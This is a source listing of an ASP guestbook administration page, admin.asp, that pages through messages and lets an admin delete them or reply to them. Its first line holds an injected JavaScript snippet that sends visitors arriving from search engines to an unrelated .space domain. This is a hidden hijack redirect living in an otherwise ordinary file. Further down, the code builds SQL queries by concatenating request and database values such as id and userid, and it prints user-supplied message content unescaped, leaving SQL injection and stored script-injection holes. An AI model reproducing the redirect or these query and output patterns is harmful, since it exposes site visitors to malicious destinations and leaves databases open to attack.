d:\wwwroot\wuchunhua\liuyan\board\admin.asp

001: <script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><!--#include file = "conn.asp"-->
002: <!--#include file="config.asp"-->
003: <%
004:    '检查用户是否已经登陆,是否是管理员
005:    If Session("IsPassed") <> True Or Session("IsAdmin") <> True Then
006:       Response.Redirect "../login.asp?ErrMsg=请先登陆"
007:       Response.End
008:    End If
009: %>
010: <HTML>
011: <HEAD>
012:   <TITLE><%=sitename%></TITLE>
013:   <link rel="stylesheet" href="style.css" type="text/css">
014:   <script language="JavaScript">
015:    function CheckAll(form)                                          
016:    {
017:         for (var i=0;i<form.elements.length;i++)                      
018:        {
019:              var e = form.elements[i];                                
020:            if (e.name != 'chkall')       e.checked = form.chkall.checked;      
021:          }
022:      }
023:   </script>
024:    </HEAD>
025: <body background=images/bg.gif topmargin="0" leftmargin="0">
026: <center>
027:   <table width="760" border=0 cellspacing=0 cellpadding=0 bgcolor="#FFFFFF" align=center class="grayline">
028:    <tr><td><img border="0" src="IMAGES/TOPS.gif" width=758></td></tr>
029:   </table>  
030:   </center>
031:   <table width="760" border=0 cellspacing=0 cellpadding=0 align=center bgcolor="#FFFFFF" class="grayline">
032: <tr><td align=center height=50>
033:     <a href=admin.asp><img border=0 src=images/admin_home.gif title="管理首页"></a> &nbsp;&nbsp;&nbsp;                                                                                  
034:     <a href=admin_set.asp><img border=0 src=images/admin_setup.gif title="管理选项设置"></a> &nbsp;&nbsp;&nbsp;                                                                                  
035:     <a href=admin_logout.asp><img border=0 src=images/loginout.gif title="管理结束后,一定要点击这里"></a>
036:    </td></tr>  
037:    <%
038:       '获取action参数
039:       action=Request.QueryString("action")
040:
041:       '管理首页
042:       If action="main" Or action = "" Then                  
043:    %>
044:    <tr><td align=center>
045:    <table width="630" border="1" cellpadding="3" bordercolor="#333333" style="border-collapse: collapse">
046:      <form name=bookform action=admin.asp method=post>
047:       <tr>  
048:        <td align=center width=18>选</td>
049:        <td align=center width=41 height=15>姓名</td>
050:        <td align=center width=150>主题</td>
051:        <td align=center width=155>内容(编辑与回复)</td>
052:        <td align=center width=128>日期</td>
053:        <td align=center width=74>状态</td>
054:       </tr>
055:        <%
056:          '定义变量
057:          Dim rs,msg_per_page,sql                        
058:
059:          '每页显示记录数
060:          msg_per_page = 10      
061:          '创建RecordSet 对象
062:          Set rs=Server.CreateObject("ADODB.RecordSet")
063:          Set rs1=Server.CreateObject("ADODB.RecordSet")
064:          '从数据库中查询所有记录并按照posttime降序排列
065:          sql="SELECT * FROM DIGITALNOTE ORDER BY POSTTIME DESC"  
066:
067:          '每页显示记录数
068:          rs.pagesize = msg_per_page          
069:          '执行查询操作
070:          rs.open sql,conn,1,3                        
071:
072:          '数据库中不存在记录
073:          If rs.EOF And rs.BOF Then                    
074:             Response.Write "<tr><td colspan=6 align=center><BR>暂时没有留言<BR><BR></td></tr>"
075:          End If
076:
077:          '检测记录集是否为空
078:          If Not (rs.EOF And rs.BOF) Then
079:             '总记录条数
080:             totalrec = RS.RecordCount
081:
082:             '计算总页数,recordcount:数据的总记录数
083:             If rs.recordcount mod msg_per_page = 0 Then
084:                '正好整除
085:                n = rs.recordcount\msg_per_page          
086:             Else
087:                '不是整除
088:                n = rs.recordcount\msg_per_page+1
089:             End If
090:
091:             'currentpage:当前页
092:             currentpage = Request("page")      
093:             
094:             'currentpage 值存在
095:             If currentpage <> "" Then  
096:                'cint函数将currentpage 转换为整数
097:                currentpage = cint(currentpage)      
098:               
099:                'currentpage 值小于1
100:                If currentpage < 1 Then    
101:                   '设置为1
102:                   currentpage = 1
103:                End If
104:
105:                '产生某种错误
106:                If err.number <> 0 Then
107:                   '清除错误信息
108:                   err.clear  
109:                   
110:                   '设置当前页为1
111:                   currentpage = 1
112:                End If
113:             Else      
114:                'currentpage 值为空
115:                currentpage = 1
116:             End If
117:
118:             '当前页大于总页数
119:             If currentpage*msg_per_page > totalrec And Not((currentpage-1)*msg_per_page < totalrec)Then
120:                currentPage=1
121:             End If
122:             
123:             'absolutepage:设置指针指向某页开头
124:             rs.absolutepage = currentpage    
125:             
126:             'pagesize:设置每一页的数据记录数
127:             rowcount = rs.pagesize      
128:             
129:             Dim i,k
130:
131:             '循环显示所有的记录
132:             Do While Not rs.EOF And rowcount>0  
133:                '留言内容
134:                content=rs("CONTENTS")  
135:               
136:                '留言主题
137:                subject = rs("SUBJECT")  
138:               
139:                '回复内容
140:                reply=rs("REPLY")
141:
142:                '获得留言用户的ID号
143:                userid = rs("USERID")
144:                '查询数据库,获得留言用户的信息
145:                sql = "SELECT * FROM MEMBER WHERE ID=" & userid
146:                '执行查询
147:                rs1.open sql, conn, 1, 1
148:
149:                If Not rs1.EOF Then
150:                   '如果记录集不为空,则获取相关信息
151:                   '用户名
152:                   UserName=rs1("NAME")
153:                Else
154:                   '记录集为空
155:                   UserName=""
156:                End If
157:
158:                rs1.Close
159:
160:                '使用Response 对象的Write 方法在网页上显示复选框、留言者姓名、留言主题、留言内容、留言日期和留言状态
161:                Response.Write "<tr><td align=center><input type='checkbox' value='"&rs("ID")&"' name=id>"            
162:                Response.Write "</td><td>"
163:                Response.Write "<a href='view.asp?userid=" & userid
164:                Response.Write "'>"
165:                Response.Write UserName
166:                Response.Write "</a>"
167:                Response.Write "</td><td>"
168:                Response.Write subject
169:
170:                '建立到管理员回复留言的超级链接
171:                Response.Write "</td><td><a href='admin.asp?action=reply&id="&rs("ID")&"'>"
172:                Response.Write content
173:                Response.Write "</a></td><td  align=center>"&rs("POSTTIME")&"</td><td  align=center>"
174:
175:                '没有留言回复
176:                If Isnull(Reply) Then                  
177:                   Response.Write "<font color=red>新留言</font>"
178:                Else        
179:                   '管理员已经回复留言
180:                   Response.Write "已回复"
181:                End If
182:               
183:                '显示一条记录后,将每页未显示的记录数减1
184:                rowcount=rowcount-1            
185:               
186:                '指向下一条记录
187:                rs.MoveNext                          
188:             loop
189:          End If
190:
191:          '关闭RecordSet 对象
192:          rs.Close                                
193:          Set rs=Nothing
194:          Set rs1=Nothing
195:       %>
196:       <tr><td colspan=6 width="616"><input type="checkbox" name=chkall onclick="CheckAll(this.form)"> 全选
197:          <input type="submit" name="action" value="删除" onclick="{if(confirm('该操作不可恢复!\n\n确实删除选定的留言?')){this.document.Prodlist.submit();return true;}return false;}">    
198:       </td></tr></form></table>
199:       </td></tr>
200:       <tr><td>
201:       <%
202:          '调用listPages 过程,显示记录数目信息、页数信息
203:          Call listPages()                          
204:       %>
205:       </td></tr>
206: <%
207:       End If
208:       
209:       '删除操作
210:       If Request("action")="删除" Then  
211:          '获得要删除记录的id
212:          'Replace 过程将获得的id 字符串中的"'"用空字符""替换
213:          delid=replace(Request.form("id"),"'","")
214:         
215:          Call delfeedback()
216:       End If
217:
218:       '回复留言
219:       If Request("action")="reply" Then
220:          '获得要回复记录的id
221:          id=Request("id")
222:
223:          Call detailfeedback()
224:       End If  
225:
226: '分页
227: Sub listPages()
228:    If n <= 1 Then Exit Sub
229: %>
230:<%=totalrec%>条留言        
231: <%If currentpage = 1 Then%>
232: <font color=darkgray>首页 前页</font>        
233: <%Else%>        
234: <a href="<%=Request.ServerVariables("script_name")%>?page=1">        
235: 首页</font></a> <a href="<%=Request.ServerVariables("script_name")%>?page=<%=currentpage-1%>">前页</a>        
236: <%End If%>        
237: <%If currentpage = n Then%>        
238: <font color=darkgray >下页 末页</font>        
239: <%Else%>        
240: <a href="<%=Request.ServerVariables("script_name")%>?page=<%=currentpage+1%>">下页</a> <a href="<%=Request.ServerVariables("script_name")%>?page=<%=n%>">末页</a>        
241: <%End If%>        
242:   第<%=currentpage%>页 共<%=n%>页        
243: <%
244: End Sub
245:
246: '留言删除
247: Sub delfeedback()  
248:    '要删除的记录id 为空
249:    If delid="" Or isnull(delid) Then                  
250:       '则给出提示
251:       Response.Write "<script>alert('操作失败,没有选择合适参数,请单击“确定”返回!');</script>"  
252:       
253:       '返回到留言管理界面
254:       Response.Redirect "admin.asp"              
255:       Response.End
256:    Else                                      
257:       'id 存在
258:       '执行数据库中的删除操作
259:       '删除数据库中id 列的值在delid数组中的记录
260:       conn.Execute("DELETE FROM DIGITALNOTE WHERE ID IN ("&delid&")")
261:
262:       '删除成功,给出提示
263:       Response.Write "<script>alert('留言删除成功,请单击“确定”返回!');</script>"      
264:
265:       '返回到留言管理界面
266:       Response.Redirect "admin.asp"              
267:       Response.End
268:    End If
269: End Sub
270:
271: Sub detailfeedback()
272:    '留言回复
273:    '要回复的留言id 为空
274:    If id="" Then                                
275:       '给出提示
276:       Response.Write "<script>alert('无此留言编号,请单击“确定”返回!');</script>"
277:
278:       '返回到留言管理界面
279:       Response.Redirect "admin.asp"              
280:       Response.End
281:    End If
282:
283:    '修改留言资料
284:    If Request("send")="ok" Then
285:       '提交留言回复内容
286:       '创建RecordSet 对象
287:       Set rs=Server.CreateObject("ADODB.RecordSet")
288:       
289:       '从数据库中查询id 列的值为id 的记录
290:       sql = "SELECT * FROM DIGITALNOTE WHERE ID="&id  
291:       
292:       '执行查询,并将结果保存在rs 中
293:       rs.open sql,conn,1,3                        
294:
295:       '存在满足条件的记录
296:       If Not (rs.EOF And rs.BOF) Then  
297:          '留言内容
298:          rs("CONTENTS")=Request.Form("contents")        
299:          '回复的留言内容,replace 函数是用<BR> 替换回复内容中的vbCRLF 字符
300:          rs("REPLY")=replace(Request.Form("Reply"),vbCRLF,"<BR>")
301:
302:          '回复时间
303:          rs("REPLYTIME") = Now()        
304:         
305:          '回复留言的管理员id号
306:          rs("REPLYUSERID") = Session("id")            
307:
308:          '更新数据库
309:          rs.update                              
310:       End If
311:       
312:       '关闭RecordSet 对象
313:       rs.Close
314:       
315:       '修改或回复成功,给出提示
316:       Response.Write "<script>alert('留言已经修改或回复成功,请单击“确定”返回!');</script>"
317:
318:       '返回到留言管理界面
319:       Response.Redirect "admin.asp"              
320:       Response.End
321:    End If
322:
323:    '显示详细资料
324:    Set rs = Server.CreateObject("ADODB.RecordSet")
325:    Set rs1 = Server.CreateObject("ADODB.RecordSet")
326:
327:    '获得该留言记录
328:    sql = "SELECT * FROM DIGITALNOTE WHERE ID="&id
329:    '执行查询
330:    rs.open sql,conn,1,1
331:
332:    '如果记录集为空
333:    '说明没有这个留言
334:    If rs.EOF And rs.BOF Then
335:       '给出提示
336:       Response.Write "<script>alert('无此留言,请单击“确定”返回!');</script>"
337:       '返回到留言管理界面
338:       Response.Redirect "admin.asp"
339:       Response.End
340:    End If
341:
342:    '记录集不空
343:    '则显示记录内容
344:    If Not (rs.EOF And rs.BOF) Then
345:       contents=replace(rs("CONTENTS"),"<BR>",vbCRLF)
346:       If rs("REPLY")<>"" Then
347:          reply=replace(rs("REPLY"),"<BR>",vbCRLF)
348:       Else
349:          reply=""  
350:       End If
351:       
352:       '获得留言用户的ID号
353:       userid = rs("USERID")
354:       '查询数据库,获得留言用户的信息
355:       sql = "SELECT * FROM MEMBER WHERE ID=" & userid
356:       '执行查询
357:       rs1.open sql, conn, 1, 1
358:
359:       If Not rs1.EOF Then
360:          '如果记录集不为空,则获取相关信息
361:          '用户名
362:          UserName=rs1("NAME")
363:       Else
364:          '记录集为空
365:          UserName=""
366:       End If
367:
368:       rs1.Close
369: %>
370:       <tr><td align = center>
371:    <table width="600" border="1" cellpadding="3" bordercolor="#333333" style="border-collapse: collapse;">
372:        <form name="reply" method="post" action='admin.asp?action=reply&id=<%=id%>'>
373:        <tr><TD align="right" width=20% height=15>留言者IP地址</TD><td><%=rs("IP")%></td></tr>
374:        <tr><TD align="right" width=20%>留言日期</TD><td><%=rs("POSTTIME")%></td></tr>  
375:        <tr><TD align="right" width=20%>留言人ID</TD><td><%=userid%>&nbsp;</td></tr>
376:        <tr><TD align="right" width=20%>留言人姓名</TD><td><%=UserName%>&nbsp;</td></tr>
377:       <tr><TD align="right" width=20%>留言主题</TD><td><%=rs("SUBJECT")%>&nbsp;</td></tr>
378:        <tr><TD align="right" width=20%>内容</TD><td><textarea style="overflow:auto" name="contents" cols="60" rows="8"><%=contents%></textarea></td></tr>
379:        <tr><TD align="right" width=20% valign=top>回复内容</TD><td><textarea style="overflow:auto" name="Reply" cols="60" rows="8"><%=reply%></textarea>&nbsp;</td></tr>
380:       <TR><TD align="right" width=20%>&nbsp;<INPUT TYPE="hidden" name=send value=ok></TD><TD>
381:       <input type="submit" name="action" value=" 提 交 "></TD></TR>
382:       </form></TABLE></td><tr>
383: <%
384:    End If
385:
386:    '关闭记录集
387:    rs.Close
388:    '释放对象
389:    Set rs = Nothing
390:
391: End Sub
392: %>
393: <table width="760" border=0 cellspacing=0 cellpadding=0 bgcolor="#FFFFFF" align=center class="grayline">
394: <tr><td> </td></tr>
395: <tr><td width=30 height=37 background="IMAGES/down.gif"><a href=#top><img src=images/up.gif border=0></a></td>
396: <td height=37 background="IMAGES/down.gif">&nbsp;&nbsp;Copyright &copy; 2005  版权所有</td>                    
397: <td width=30 height=37 background="IMAGES/down.gif"><a href=admin_login.asp title="管理留言本"><img src=images/admin.gif border=0></a></td>
398: </tr>
399: </table>
400: </body>
401: <%
402:    '关闭数据库连接
403:    conn.Close
404:    Set conn = Nothing
405: %>
406:
407: